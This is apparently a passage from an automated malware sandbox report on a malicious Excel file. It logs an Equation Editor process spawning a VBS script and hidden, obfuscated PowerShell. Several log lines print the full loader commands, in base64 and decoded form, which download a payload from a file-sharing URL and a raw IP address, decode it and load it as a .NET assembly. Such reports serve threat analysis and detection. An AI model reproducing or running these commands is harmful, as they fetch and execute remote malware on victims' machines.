vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: fUHl7rElXU.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: fUHl7rElXU.xlsxInitial sample: OLE indicators vbamacros = False

        Data Obfuscation

        barindex
        Obfuscated command line found
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"
